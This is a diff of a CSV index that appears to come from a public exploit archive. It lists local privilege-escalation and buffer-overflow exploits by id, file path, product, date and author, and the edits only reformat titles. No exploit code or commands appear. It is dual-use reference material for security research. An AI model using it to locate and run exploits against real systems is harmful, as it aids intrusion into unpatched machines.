 16099,platforms/android/local/16099.c,"Google Android 1.x/2.x - Privilege Escalation",2011-02-02,"The Android Exploid Crew",android,local,0
 16107,platforms/windows/local/16107.py,"AOL Desktop 9.6 - '.rtx' Buffer Overflow",2011-02-03,sickness,windows,local,0
-16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - sendfile kernel mem-leak Exploit",2011-02-06,kingcope,freebsd,local,0
+16119,platforms/freebsd/local/16119.c,"FreeBSD 5.4-RELEASE ftpd 6.00LS - 'sendfile' Memory Leak Exploit",2011-02-06,kingcope,freebsd,local,0
 16132,platforms/windows/local/16132.htm,"AoA DVD Creator 2.5 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
 16133,platforms/windows/local/16133.htm,"AoA Mp4 Converter 4.1.0 - ActiveX Stack Overflow",2011-02-07,"Carlos Mario Penagos Hollmann",windows,local,0
 16138,platforms/windows/local/16138.c,"DESlock+ < 4.1.10 - 'vdlptokn.sys' Local Kernel Ring0 SYSTEM Exploit",2011-02-09,mu-b,windows,local,0
@ -7334,7 +7335,7 @@ id,file,description,date,author,platform,type,port
 19122,platforms/linux/local/19122.txt,"Slackware Linux 3.5 - Missing /etc/group Privilege Escalation",1998-07-13,"Richard Thomas",linux,local,0
 19125,platforms/linux/local/19125.txt,"Oracle 8 - oratclsh Suid",1999-04-29,"Dan Sugalski",linux,local,0
 19126,platforms/solaris/local/19126.txt,"Sun Solaris 2.6 power management - Exploit",1998-07-16,"Ralf Lehmann",solaris,local,0
-19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 sdtcm_convert - Exploit",1998-10-23,UNYUN,solaris,local,0
+19128,platforms/solaris/local/19128.c,"Sun Solaris 7.0 - 'sdtcm_convert' Exploit",1998-10-23,UNYUN,solaris,local,0
 19138,platforms/windows/local/19138.txt,"ESRI ArcGIS 10.0.x / ArcMap 9 - Arbitrary Code Execution",2012-06-14,"Boston Cyber Defense",windows,local,0
 19139,platforms/multiple/local/19139.py,"Adobe Illustrator CS5.5 - Memory Corruption",2012-06-14,"Felipe Andres Manzano",multiple,local,0
 19142,platforms/linux/local/19142.sh,"Oracle 8 - File Access",1999-05-06,"Kevin Wenchel",linux,local,0
@ -7358,10 +7359,10 @@ id,file,description,date,author,platform,type,port
 19196,platforms/windows/local/19196.txt,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - RAS Dial-up Networking 'Save Password'",1998-03-19,"Martin Dolphin",windows,local,0
 19198,platforms/windows/local/19198.txt,"Microsoft Windows NT 4.0 SP4 - Known DLL Cache",1999-02-18,L0pht,windows,local,0
 19199,platforms/solaris/local/19199.c,"Solaris 2.5.1 automount - Exploit",1997-11-26,anonymous,solaris,local,0
-19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (1)",1997-08-25,bloodmask,unix,local,0
-19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (2)",1997-08-25,jGgM,unix,local,0
-19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - libXt library Exploit (3)",1997-08-25,jGgM,unix,local,0
-19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - rlogin Exploit",1996-12-04,"Roger Espel Llima",unix,local,0
+19200,platforms/unix/local/19200.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (1)",1997-08-25,bloodmask,unix,local,0
+19201,platforms/unix/local/19201.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (2)",1997-08-25,jGgM,unix,local,0
+19202,platforms/unix/local/19202.c,"BSD/OS 2.1 / Caldera UnixWare 7/7.1.0 / FreeBSD 1.1.5.1/2.0 / HP HP-UX 10.34 / IBM AIX 4.2 / SGI IRIX 6.3 / SunOS 4.1.4 - 'libXt Library' Exploit (3)",1997-08-25,jGgM,unix,local,0
+19203,platforms/unix/local/19203.c,"BSD/OS 2.1 / DG/UX 4.0 / Debian 0.93 / Digital UNIX 4.0 B / FreeBSD 2.1.5 / HP-UX 10.34 / IBM AIX 4.1.5 / NetBSD 1.0/1.1 / NeXTstep 4.0 / SGI IRIX 6.3 / SunOS 4.1.4 - 'rlogin' Exploit",1996-12-04,"Roger Espel Llima",unix,local,0
 19205,platforms/solaris/local/19205.c,"Sun Solaris 7.0 dtprintinfo - Buffer Overflow",1999-05-10,UNYUN@ShadowPenguin,solaris,local,0
 19206,platforms/solaris/local/19206.c,"Sun Solaris 7.0 lpset - Buffer Overflow",1999-05-11,"kim yong-jun",solaris,local,0
 19209,platforms/windows/local/19209.c,"Microsoft Windows NT 4.0/4.0 SP1/4.0 SP2/4.0 SP3/4.0 SP4/4.0 SP5 - Help File Buffer Overflow",1999-05-17,"David Litchfield",windows,local,0
@ -7391,7 +7392,7 @@ id,file,description,date,author,platform,type,port
 19258,platforms/solaris/local/19258.sh,"Sun Solaris 7.0 ff.core - Exploit",1999-01-07,"John McDonald",solaris,local,0
 19259,platforms/linux/local/19259.c,"S.u.S.E. 5.2 lpc - Exploit",1999-02-03,xnec,linux,local,0
 19260,platforms/irix/local/19260.sh,"SGI IRIX 6.2 - '/usr/lib/netaddpr' Exploit",1997-05-09,"Jaechul Choe",irix,local,0
-19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 at(1) - Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
+19261,platforms/netbsd_x86/local/19261.txt,"NetBSD 1.3.2 / SGI IRIX 6.5.1 - 'at(1)' Exploit",1998-06-27,Gutierrez,netbsd_x86,local,0
 19262,platforms/irix/local/19262.txt,"SGI IRIX 6.2 cdplayer - Exploit",1996-11-21,"Yuri Volobuev",irix,local,0
 19267,platforms/irix/local/19267.c,"SGI IRIX 6.3 - xrm Buffer Overflow",1997-05-27,"David Hedley",irix,local,0
 19268,platforms/irix/local/19268.txt,"SGI IRIX 5.3 Cadmin - Exploit",1996-08-06,"Grant Kaufmann",irix,local,0
@ -7454,8 +7455,8 @@ id,file,description,date,author,platform,type,port
 19384,platforms/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",linux,local,0
 19370,platforms/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Buffer Overflow",1999-06-25,KSR[T],linux,local,0
 19371,platforms/linux/local/19371.c,"VMware 1.0.1 - Buffer Overflow",1999-06-25,funkysh,linux,local,0
-19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0
-19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - Lsof Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0
+19373,platforms/linux/local/19373.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (1)",1999-02-17,c0nd0r,linux,local,0
+19374,platforms/linux/local/19374.c,"Debian 2.0/2.0 r5 / FreeBSD 3.2 / OpenBSD 2.4 / RedHat 5.2 i386 / S.u.S.E. 6.1 - 'Lsof' Buffer Overflow (2)",1999-02-17,Zhodiac,linux,local,0
 19376,platforms/windows/local/19376.txt,"Microsoft IIS 2.0/3.0/4.0 - ISAPI GetExtensionVersion()",1999-03-08,"Fabien Royer",windows,local,0
 19417,platforms/osx/local/19417.txt,"Apple Mac OS 8 8.6 - Weak Password Encryption",1999-07-10,"Dawid adix Adamski",osx,local,0
 19418,platforms/aix/local/19418.txt,"IBM AIX 4.3.1 adb - Exploit",1999-07-12,"GZ Apple",aix,local,0
@ -7510,13 +7511,13 @@ id,file,description,date,author,platform,type,port
 19535,platforms/hp-ux/local/19535.pl,"HP-UX 10.20 newgrp - Exploit",1996-12-01,SOD,hp-ux,local,0
 19542,platforms/sco/local/19542.txt,"SCO Open Server 5.0.5 - 'userOsa' Symlink Exploit",1999-10-11,"Brock Tellier",sco,local,0
 19543,platforms/sco/local/19543.c,"SCO Open Server 5.0.5 - cancel Buffer Overflow",1999-10-08,"Brock Tellier",sco,local,0
-19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0
-19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - lpr Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0
+19544,platforms/linux/local/19544.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (1)",1996-10-25,"Vadim Kolontsov",linux,local,0
+19545,platforms/bsd/local/19545.c,"BSD/OS 2.1 / FreeBSD 2.1.5 / NeXTstep 4.x / IRIX 6.4 / SunOS 4.1.3/4.1.4 - 'lpr' Buffer Overrun (2)",1996-10-25,"Vadim Kolontsov",bsd,local,0
 19546,platforms/multiple/local/19546.pl,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (1)",1997-04-17,"Pavel Kankovsky",multiple,local,0
 19547,platforms/multiple/local/19547.txt,"BSD/OS 2.1/3.0 / Larry Wall Perl 5.0 03 / RedHat 4.0/4.1 / SGI Freeware 1.0/2.0 SUIDPerl - Overflow Exploit (2)",1997-04-17,"Willy Tarreau",multiple,local,0
 19551,platforms/multiple/local/19551.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (1)",1997-02-13,"Last Stage of Delirium",multiple,local,0
 19552,platforms/multiple/local/19552.c,"UNICOS 9/MAX 1.3/mk 1.5 / AIX 4.2 / libc 5.2.18 / RedHat 4 / IRIX 6 / Slackware 3 - NLS Exploit (2)",1997-02-13,"Solar Designer",multiple,local,0
-19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon",1996-11-16,"Leshka Zakharoff",multiple,local,0
+19556,platforms/multiple/local/19556.sh,"BSD 2 / CND 1 / Sendmail 8.x / FreeBSD 2.1.x / HP-UX 10.x / AIX 4 / RedHat 4 - Sendmail Daemon Exploit",1996-11-16,"Leshka Zakharoff",multiple,local,0
 19565,platforms/linux/local/19565.sh,"S.u.S.E. Linux 6.1/6.2 - cwdtools Exploit",1999-10-22,"Brock Tellier",linux,local,0
 19673,platforms/windows/local/19673.txt,"Microsoft Windows 95/98/NT 4.0 - Help File Trojan",1999-12-10,"Pauli Ojanpera",windows,local,0
 19674,platforms/sco/local/19674.c,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - Privileged Program Debugging",1999-12-10,"Brock Tellier",sco,local,0
@ -7535,11 +7536,11 @@ id,file,description,date,author,platform,type,port
 19643,platforms/sco/local/19643.c,"SCO Unixware 2.1/7.0/7.0.1/7.1/7.1.1 - su(1) Buffer Overflow",1999-10-30,K2,sco,local,0
 19647,platforms/solaris/local/19647.c,"Solaris 7.0 kcms_configure - Exploit",1999-11-30,UNYUN,solaris,local,0
 19648,platforms/solaris/local/19648.c,"Solaris 7.0 - CDE dtmail/mailtool Buffer Overflow",1999-11-30,UNYUN,solaris,local,0
-19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 gdc - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
-19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 gdc - Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0
-19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid dialer",1999-12-01,"Brock Tellier",freebsd,local,0
-19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 xmindpath - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
-19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 angband - Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19649,platforms/freebsd/local/19649.c,"FreeBSD 3.3 - 'gdc' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19650,platforms/freebsd/local/19650.txt,"FreeBSD 3.3 - 'gdc' Symlink Exploit",1999-12-01,"Brock Tellier",freebsd,local,0
+19651,platforms/freebsd/local/19651.txt,"FreeBSD 3.3 - Seyon setgid Dialer",1999-12-01,"Brock Tellier",freebsd,local,0
+19652,platforms/freebsd/local/19652.c,"FreeBSD 3.3 - 'xmindpath' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
+19653,platforms/freebsd/local/19653.c,"FreeBSD 3.3 - 'angband' Buffer Overflow",1999-12-01,"Brock Tellier",freebsd,local,0
 40430,platforms/windows/local/40430.cs,"Microsoft Windows - RegLoadAppKey Hive Enumeration Privilege Escalation (MS16-111)",2016-09-26,"Google Security Research",windows,local,0
 19654,platforms/sco/local/19654.pl,"SCO Unixware 7.0/7.0.1/7.1/7.1.1 - 'uidadmin' Exploit",1998-12-02,"Brock Tellier",sco,local,0
 19655,platforms/linux/local/19655.txt,"RSA Security RSAREF 2.0 - Buffer Overflow",1999-12-14,"Alberto Solino",linux,local,0
@ -7575,7 +7576,7 @@ id,file,description,date,author,platform,type,port
 19739,platforms/windows/local/19739.txt,"Microsoft Windows NT 4.0 - Recycle Bin Pre-created Folder",2000-02-01,"Arne Vidstron and Nobuo Miwa",windows,local,0
 19752,platforms/sco/local/19752.txt,"SCO Unixware 7.1/7.1.1 - ARCserver /tmp Symlink Exploit",2000-02-15,"Shawn Bracken",sco,local,0
 19754,platforms/windows/local/19754.txt,"Microsoft Windows 95/98/NT 4.0 - autorun.inf Exploit",2000-02-18,"Eric Stevens",windows,local,0
-19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 Asmon/Ascpu - Exploit",2000-02-19,anonymous,freebsd,local,0
+19756,platforms/freebsd/local/19756.txt,"FreeBSD 3.0/3.1/3.2/3.3/3.4 - 'Asmon'/'Ascpu' Exploit",2000-02-19,anonymous,freebsd,local,0
 19757,platforms/solaris/local/19757.txt,"Sun Workshop 5.0 - Licensing Manager Symlink Exploit",2000-02-21,sp00n,solaris,local,0
 19762,platforms/linux/local/19762.c,"FTPx FTP Explorer 1.0.00.10 - Weak Password Encryption",2000-02-25,"Nelson Brito",linux,local,0
 19763,platforms/linux/local/19763.txt,"RedHat Linux 6.0 - Single User Mode Authentication",2000-02-23,"Darren Reed",linux,local,0
@ -7640,8 +7641,8 @@ id,file,description,date,author,platform,type,port
 19981,platforms/linux/local/19981.sh,"KDE 1.1.2 KApplication configfile - Exploit (3)",2000-05-31,IhaQueR,linux,local,0
 19989,platforms/windows/local/19989.c,"PassWD 1.2 - Weak Encryption",2000-06-04,"Daniel Roethlisberger",windows,local,0
 19990,platforms/hp-ux/local/19990.txt,"HP-UX 10.20/11.0 - man '/tmp' Symlink Exploit",2000-06-02,"Jason Axley",hp-ux,local,0
-19991,platforms/linux/local/19991.c,"BSD mailx 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
-19992,platforms/linux/local/19992.c,"BSD mailx 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
+19991,platforms/linux/local/19991.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (1)",2000-06-02,"Paulo Ribeiro",linux,local,0
+19992,platforms/linux/local/19992.c,"BSD 'mailx' 8.1.1-10 - Buffer Overflow (2)",1999-07-03,funkysh,linux,local,0
 19993,platforms/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",windows,local,0
 19999,platforms/multiple/local/19999.txt,"BRU 15.1/16.0 - BRUEXECLOG Environment Variable",2000-06-05,"Riley Hassell",multiple,local,0
 20000,platforms/linux/local/20000.c,"Linux Kernel 2.2.x 2.4.0-test1 (SGI ProPack 1.2/1.3) - Sendmail Capabilities Privilege Escalation(1)",2000-06-07,"Florian Heinz",linux,local,0
@ -7705,7 +7706,7 @@ id,file,description,date,author,platform,type,port
 20250,platforms/linux/local/20250.c,"LBL Traceroute 1.4 a5 - Heap Corruption (1)",2000-09-28,Dvorak,linux,local,0
 20251,platforms/linux/local/20251.c,"LBL Traceroute 1.4 a5 - Heap Corruption (2)",2000-09-28,"Perry Harrington",linux,local,0
 20252,platforms/linux/local/20252.c,"LBL Traceroute 1.4 a5 - Heap Corruption (3)",2000-09-28,"Michel Kaempf",linux,local,0
-20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - fstat Format String",2000-10-04,K2,openbsd,local,0
+20256,platforms/openbsd/local/20256.c,"OpenBSD 2.x - 'fstat' Format String",2000-10-04,K2,openbsd,local,0
 20257,platforms/windows/local/20257.txt,"Microsoft Windows NT 4.0/2000 Predictable LPC Message Identifier - Multiple Vulnerabilities",2000-10-03,"BindView's Razor Team",windows,local,0
 20543,platforms/windows/local/20543.rb,"Microsoft Windows - Service Trusted Path Privilege Escalation (Metasploit)",2012-08-15,Metasploit,windows,local,0
 20262,platforms/windows/local/20262.py,"CoolPlayer Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (2)",2012-08-05,pole,windows,local,0
@ -7721,7 +7722,7 @@ id,file,description,date,author,platform,type,port
 20296,platforms/windows/local/20296.rb,"CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode)",2012-08-06,"Robert Larsen",windows,local,0
 40428,platforms/windows/local/40428.txt,"Macro Expert 4.0 - Multiple Privilege Escalations",2016-09-26,Tulpa,windows,local,0
 20312,platforms/linux/local/20312.c,"Oracle Internet Directory 2.0.6 - oidldap Exploit",2000-10-18,"Juan Manuel Pascual EscribÃ¡",linux,local,0
-20316,platforms/linux/local/20316.txt,"BSD lpr 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0
+20316,platforms/linux/local/20316.txt,"BSD 'lpr' 0.54 -4 - Arbitrary Command Execution",2000-10-20,"zenith parsec",linux,local,0
 20317,platforms/windows/local/20317.c,"Microsoft Windows NT 4.0 - MSIEXEC Registry Permissions",2000-10-23,Mnemonix,windows,local,0
 20326,platforms/unix/local/20326.sh,"ntop 1.x - i Local Format String",2000-10-18,"Paul Starzetz",unix,local,0
 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 - crontab '/tmp' File Exploit",2000-10-20,"Kyong-won Cho",hp-ux,local,0
@ -7729,7 +7730,7 @@ id,file,description,date,author,platform,type,port
 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0
 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0
 20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0
-20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x /usr/bin/top - Format String",2000-11-01,truefinder,freebsd,local,0
+20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - '/usr/bin/top' Format String",2000-11-01,truefinder,freebsd,local,0
 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0
 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0
 20381,platforms/unix/local/20381.c,"ManTrap 1.6.1 - Root Directory Inode Disclosure",2000-11-01,f8labs,unix,local,0
@ -7935,7 +7936,7 @@ id,file,description,date,author,platform,type,port
 21373,platforms/openbsd/local/21373.c,"OpenBSD 2.9/3.0 - Default Crontab Root Compromise",2002-04-11,"Przemyslaw Frasunek",openbsd,local,0
 21375,platforms/linux/local/21375.txt,"ISC INN 2.0/2.1/2.2.x - Multiple Local Format String Vulnerabilities",2002-04-11,"Paul Starzetz",linux,local,0
 21398,platforms/linux/local/21398.txt,"SSH2 3.0 - Restricted Shell Escaping Command Execution",2002-04-18,A.Dimitrov,linux,local,0
-21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0
+21407,platforms/bsd/local/21407.c,"Apple Mac OSX 10.x / FreeBSD 4.x / OpenBSD 2.x / Solaris 2.5/2.6/7.0/8 - 'exec C Library' Standard I/O File Descriptor Closure",2002-04-23,phased,bsd,local,0
 21408,platforms/unix/local/21408.pl,"SLRNPull 0.9.6 - Spool Directory Command Line Parameter Buffer Overflow",2002-04-22,zillion,unix,local,0
 21414,platforms/unix/local/21414.c,"GNU Screen 3.9.x Braille Module - Buffer Overflow",2002-04-23,"Gobbles Security",unix,local,0
 21420,platforms/linux/local/21420.c,"Sudo 1.6.x - Password Prompt Heap Overflow",2001-11-01,MaXX,linux,local,0
@ -8059,8 +8060,8 @@ id,file,description,date,author,platform,type,port
 22248,platforms/hp-ux/local/22248.sh,"HP-UX 10.x - rs.F3000 Unspecified Unauthorized Access",2003-02-12,"Last Stage of Delirium",hp-ux,local,0
 22265,platforms/linux/local/22265.pl,"cPanel 5.0 - 'Openwebmail' Privilege Escalation",2003-02-19,deadbeat,linux,local,0
 22272,platforms/multiple/local/22272.pl,"Perl2Exe 1.0 9/5.0 2/6.0 - Code Obfuscation",2002-02-22,"Simon Cozens",multiple,local,0
-22332,platforms/unix/local/22332.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
-22331,platforms/unix/local/22331.c,"BSD lpr 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
+22332,platforms/unix/local/22332.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (2)",1998-04-22,CMN,unix,local,0
+22331,platforms/unix/local/22331.c,"BSD 'lpr' 2000.05.07/0.48/0.72 / lpr-ppd 0.72 - Local Buffer Overflow (1)",1998-04-22,"Niall Smart",unix,local,0
 22320,platforms/linux/local/22320.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (1)",2003-03-03,"dcryptr && tarranta",linux,local,0
 22321,platforms/linux/local/22321.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (2)",2003-03-03,"Guilecool & deka",linux,local,0
 22322,platforms/linux/local/22322.c,"XFree86 4.2 - XLOCALEDIR Local Buffer Overflow (3)",2003-03-03,omega,linux,local,0
@ -8216,7 +8217,7 @@ id,file,description,date,author,platform,type,port
 23610,platforms/unix/local/23610.c,"IBM Informix Dynamic Server 9.40/Informix Extended Parallel Server 8.40 - Multiple Vulnerabilities (2)",2003-08-08,pask,unix,local,0
 23611,platforms/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",multiple,local,0
 23634,platforms/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,linux,local,0
-23655,platforms/bsd/local/23655.txt,"BSD Kernel - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
+23655,platforms/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",bsd,local,0
 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",linux,local,0
 23674,platforms/linux/local/23674.txt,"(Linux Kernel 2.6) Samba 2.2.8 (Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",linux,local,0
 23682,platforms/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,linux,local,0
@ -8318,7 +8319,7 @@ id,file,description,date,author,platform,type,port
 25419,platforms/windows/local/25419.pl,"Adrenalin Player 2.2.5.3 - '.m3u' Buffer Overflow (SEH)",2013-05-13,seaofglass,windows,local,0
 25444,platforms/linux/local/25444.c,"Linux Kernel 2.6.32 < 3.x.x (CentOS) - 'PERF_EVENTS' Privilege Escalation (1)",2013-05-14,sd,linux,local,0
 25448,platforms/windows/local/25448.rb,"ERS Viewer 2011 - '.ERS' File Handling Buffer Overflow (Metasploit)",2013-05-14,Metasploit,windows,local,0
-25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability file_ns_capable() Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
+25450,platforms/linux/local/25450.c,"Linux Kernel < 3.8.x - open-time Capability 'file_ns_capable()' Privilege Escalation",2013-05-14,"Andrew Lutomirski",linux,local,0
 25554,platforms/windows/local/25554.c,"Altiris Client 6.0.88 - Service Privilege Escalation",2005-04-27,"Reed Arvin",windows,local,0
 40394,platforms/linux/local/40394.rb,"Docker Daemon - Privilege Escalation (Metasploit)",2016-09-19,Metasploit,linux,local,0
 25607,platforms/windows/local/25607.py,"Ophcrack 3.5.0 - Code Execution Local Buffer Overflow",2013-05-21,xis_one,windows,local,0
@ -8352,7 +8353,7 @@ id,file,description,date,author,platform,type,port
 26352,platforms/php/local/26352.php,"PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities",2005-10-17,anonymous,php,local,0
 26353,platforms/linux/local/26353.txt,"Linux Kernel 2.6 - Console Keymap Local Command Injection (PoC)",2005-10-17,"Rudolf Polzer",linux,local,0
 26367,platforms/windows/local/26367.py,"Adrenalin Player 2.2.5.3 - '.asx' Buffer Overflow (SEH)",2013-06-21,Onying,windows,local,0
-26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 mmap/ptrace - Privilege Escalation",2013-06-21,Hunger,freebsd,local,0
+26368,platforms/freebsd/local/26368.c,"FreeBSD 9.0 < 9.1 - 'mmap/ptrace' Privilege Escalation",2013-06-21,Hunger,freebsd,local,0
 26402,platforms/windows/local/26402.py,"Mediacoder (.lst) - Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
 26403,platforms/windows/local/26403.py,"Mediacoder - '.m3u' Buffer Overflow (SEH)",2013-06-24,metacom,windows,local,0
 26404,platforms/windows/local/26404.py,"Mediacoder PMP Edition 0.8.17 - '.m3u' Buffer Overflow",2013-06-24,metacom,windows,local,0
@ -8379,7 +8380,7 @@ id,file,description,date,author,platform,type,port
 26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
 26805,platforms/windows/local/26805.rb,"Corel PDF Fusion - Stack Buffer Overflow (Metasploit)",2013-07-13,Metasploit,windows,local,0
 26889,platforms/windows/local/26889.pl,"BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET)",2013-07-16,PuN1sh3r,windows,local,0
-40385,platforms/netbsd_x86/local/40385.rb,"NetBSD mail.local(8) - Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
+40385,platforms/netbsd_x86/local/40385.rb,"NetBSD - 'mail.local(8)' Privilege Escalation (Metasploit)",2016-09-15,Metasploit,netbsd_x86,local,0
 26950,platforms/windows/local/26950.c,"Symantec Workspace Virtualization 6.4.1895.0 - Kernel Mode Privilege Escalation",2013-07-18,MJ0011,windows,local,0
 26970,platforms/windows/local/26970.c,"McAfee VirusScan 8.0 - Path Specification Privilege Escalation",2005-12-22,"Reed Arvin",windows,local,0
 26996,platforms/aix/local/26996.txt,"IBM AIX 5.3 - GetShell and GetCommand File Enumeration",2005-12-30,xfocus,aix,local,0
@ -8440,7 +8441,7 @@ id,file,description,date,author,platform,type,port
 40768,platforms/linux/local/40768.sh,"Nginx (Debian-Based Distros + Gentoo) - 'logrotate' Privilege Escalation",2016-11-16,"Dawid Golunski",linux,local,0
 29069,platforms/windows/local/29069.c,"Computer Associates Personal Firewall 9.0 - HIPS Driver 'kmxfw.sys' Privilege Escalation",2006-11-16,"Ruben Santamarta",windows,local,0
